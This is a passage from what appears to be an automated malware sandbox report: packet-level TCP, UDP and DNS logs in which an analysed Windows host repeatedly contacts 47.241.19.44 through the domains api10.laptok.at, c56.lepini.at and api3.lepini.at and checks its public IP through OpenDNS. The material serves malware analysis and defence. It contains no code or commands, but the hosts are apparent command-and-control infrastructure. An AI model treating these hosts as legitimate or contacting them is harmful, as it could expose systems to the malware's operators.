                                                                                                                                            Nov 23, 2020 12:20:00.989774942 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.989811897 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.989850044 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.989886045 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.989933014 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.989939928 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.989973068 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.989983082 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990058899 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.990091085 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990153074 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.990158081 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990230083 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990267992 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990326881 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.990326881 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990365028 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990377903 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.990402937 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990449905 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990483999 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.990495920 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990571022 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:00.990618944 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.990657091 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:00.991269112 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.088466883 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.088512897 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.088648081 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264022112 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264070034 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264107943 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264146090 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264209986 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264244080 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264260054 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264276981 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264297009 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264367104 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264399052 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264414072 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264492035 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264492035 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264533997 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264621973 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264668941 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264672995 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264713049 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264719963 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264755964 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264816046 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.264858007 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.264904976 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.274740934 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.274787903 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.274835110 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.274876118 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.274894953 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.274914026 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.274951935 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.274957895 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.274990082 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275026083 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275027990 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.275063992 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275100946 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275106907 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.275146961 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275186062 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.275190115 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275228024 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275265932 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275266886 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.275302887 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275340080 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275341988 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.275377035 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.275425911 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.315814972 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.362150908 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.409676075 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.538252115 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538343906 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538383007 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538420916 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538458109 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538490057 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.538494110 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538520098 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.538532019 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538641930 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538677931 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.538686991 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538733959 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.538753986 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538803101 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538839102 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538863897 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.538922071 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.538973093 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.538994074 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.539055109 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.539069891 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.539143085 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.539233923 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.539273977 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.539274931 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.539310932 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.539350033 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.539365053 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.539470911 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.647371054 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647480011 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647547960 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647586107 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647593975 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.647622108 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647655964 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.647660971 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647742033 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647751093 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.647839069 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647936106 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.647973061 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.647974968 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.648011923 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.648044109 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.648049116 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.648106098 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.648164988 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.648263931 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.648303986 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.648343086 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.683119059 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.683244944 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.688138962 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.688175917 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.688209057 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.688250065 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.688258886 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.688302994 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:01.812583923 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.833714008 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.833734989 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:01.833880901 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:02.725779057 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:02.725991964 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:03.585108042 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:03.858584881 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:03.858633041 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:03.858665943 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:03.858735085 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:03.858792067 CET4976580192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:04.132227898 CET804976547.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:13.472692966 CET4976680192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:13.752351046 CET804976647.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:13.752512932 CET4976680192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:13.752633095 CET4976680192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:14.075851917 CET804976647.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:14.988385916 CET804976647.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:14.988488913 CET4976680192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:14.988621950 CET4976680192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:15.050283909 CET4976880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:15.268137932 CET804976647.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:15.327203035 CET804976847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:15.327306986 CET4976880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:15.327480078 CET4976880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:15.330399990 CET4976880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:15.604386091 CET804976847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:15.607285976 CET804976847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:16.533633947 CET804976847.241.19.44192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:16.533725023 CET4976880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:16.534030914 CET4976880192.168.2.447.241.19.44
                                                                                                                                            Nov 23, 2020 12:20:16.810949087 CET804976847.241.19.44192.168.2.4

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 23, 2020 12:18:46.570199013 CET4925753192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:18:46.597249031 CET53492578.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:18:47.557322979 CET6238953192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:18:47.593255997 CET53623898.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:18:52.284771919 CET4991053192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:18:52.312025070 CET53499108.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:18:53.012953043 CET5585453192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:18:53.040066004 CET53558548.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:18:54.080920935 CET6454953192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:18:54.107846022 CET53645498.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:18:54.919960022 CET6315353192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:18:54.947187901 CET53631538.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:01.407439947 CET5299153192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:01.434551954 CET53529918.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:06.562824011 CET5370053192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:06.599641085 CET53537008.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:07.614770889 CET5172653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:07.939614058 CET53517268.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:08.168842077 CET5679453192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:08.196083069 CET53567948.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:11.244085073 CET5653453192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:11.271193027 CET53565348.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:12.320729017 CET5662753192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:12.348102093 CET53566278.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:13.540397882 CET5662153192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:13.581149101 CET53566218.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:13.780139923 CET6311653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:13.807528973 CET53631168.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:15.260731936 CET6407853192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:15.287969112 CET53640788.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:16.150295973 CET6480153192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:16.177867889 CET53648018.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:17.680984020 CET6172153192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:17.708213091 CET53617218.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:18.798482895 CET5125553192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:18.834115028 CET53512558.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:18.878098965 CET6152253192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:18.905194044 CET53615228.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:19.683197975 CET5233753192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:19.718893051 CET53523378.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:22.286604881 CET5504653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:22.322698116 CET53550468.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:22.796526909 CET4961253192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:22.836855888 CET53496128.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:23.244935036 CET4928553192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:23.280853033 CET53492858.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:23.602293015 CET5060153192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:23.638015032 CET53506018.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:23.649595022 CET6087553192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:23.693440914 CET53608758.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:23.849045992 CET5644853192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:23.876090050 CET53564488.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:23.937958002 CET5917253192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:23.975613117 CET53591728.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:24.375437021 CET6242053192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:24.411318064 CET53624208.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:24.816014051 CET6057953192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:24.853601933 CET53605798.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:25.177424908 CET5018353192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:25.204924107 CET53501838.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:25.393731117 CET6153153192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:25.434168100 CET53615318.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:26.042188883 CET4922853192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:26.078011036 CET53492288.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:26.454986095 CET5979453192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:26.490641117 CET53597948.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:36.530822039 CET5591653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:36.566790104 CET53559168.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:37.518486977 CET5591653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:37.554110050 CET53559168.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:38.533106089 CET5591653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:38.560381889 CET53559168.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:39.905623913 CET5275253192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:39.942928076 CET53527528.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:40.548924923 CET5591653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:40.584266901 CET53559168.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:44.549137115 CET5591653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:44.584777117 CET53559168.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:19:59.753671885 CET6054253192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:19:59.789554119 CET53605428.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:09.503115892 CET6068953192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:20:09.530307055 CET53606898.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:09.535417080 CET6069053192.168.2.4208.67.222.222
                                                                                                                                            Nov 23, 2020 12:20:09.552117109 CET5360690208.67.222.222192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:09.553596020 CET6069153192.168.2.4208.67.222.222
                                                                                                                                            Nov 23, 2020 12:20:09.570106983 CET5360691208.67.222.222192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:09.586766005 CET6069253192.168.2.4208.67.222.222
                                                                                                                                            Nov 23, 2020 12:20:09.603360891 CET5360692208.67.222.222192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:13.144649029 CET6420653192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:20:13.472007036 CET53642068.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:14.278291941 CET5090453192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:20:14.305594921 CET53509048.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:15.013784885 CET5752553192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:20:15.049266100 CET53575258.8.8.8192.168.2.4
                                                                                                                                            Nov 23, 2020 12:20:17.777049065 CET5381453192.168.2.48.8.8.8
                                                                                                                                            Nov 23, 2020 12:20:17.820941925 CET53538148.8.8.8192.168.2.4

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                            Nov 23, 2020 12:19:07.614770889 CET192.168.2.48.8.8.80x39b8Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:19:13.540397882 CET192.168.2.48.8.8.80x12c8Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:19:18.798482895 CET192.168.2.48.8.8.80x2e40Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:19:59.753671885 CET192.168.2.48.8.8.80x48d6Standard query (0)c56.lepini.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.503115892 CET192.168.2.48.8.8.80x4f3cStandard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.535417080 CET192.168.2.4208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.553596020 CET192.168.2.4208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.586766005 CET192.168.2.4208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:13.144649029 CET192.168.2.48.8.8.80x78fdStandard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:15.013784885 CET192.168.2.48.8.8.80xd522Standard query (0)api3.lepini.atA (IP address)IN (0x0001)

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                            Nov 23, 2020 12:19:07.939614058 CET8.8.8.8192.168.2.40x39b8No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:19:13.581149101 CET8.8.8.8192.168.2.40x12c8No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:19:18.834115028 CET8.8.8.8192.168.2.40x2e40No error (0)api10.laptok.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:19:59.789554119 CET8.8.8.8192.168.2.40x48d6No error (0)c56.lepini.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.530307055 CET8.8.8.8192.168.2.40x4f3cNo error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.552117109 CET208.67.222.222192.168.2.40x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.570106983 CET208.67.222.222192.168.2.40x2No error (0)myip.opendns.com84.17.52.25A (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:09.603360891 CET208.67.222.222192.168.2.40x3Name error (3)myip.opendns.comnonenone28IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:13.472007036 CET8.8.8.8192.168.2.40x78fdNo error (0)api3.lepini.at47.241.19.44A (IP address)IN (0x0001)
                                                                                                                                            Nov 23, 2020 12:20:15.049266100 CET8.8.8.8192.168.2.40xd522No error (0)api3.lepini.at47.241.19.44A (IP address)IN (0x0001)

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • api10.laptok.at
                                                                                                                                            • c56.lepini.at
                                                                                                                                            • api3.lepini.at

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.44973247.241.19.4480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
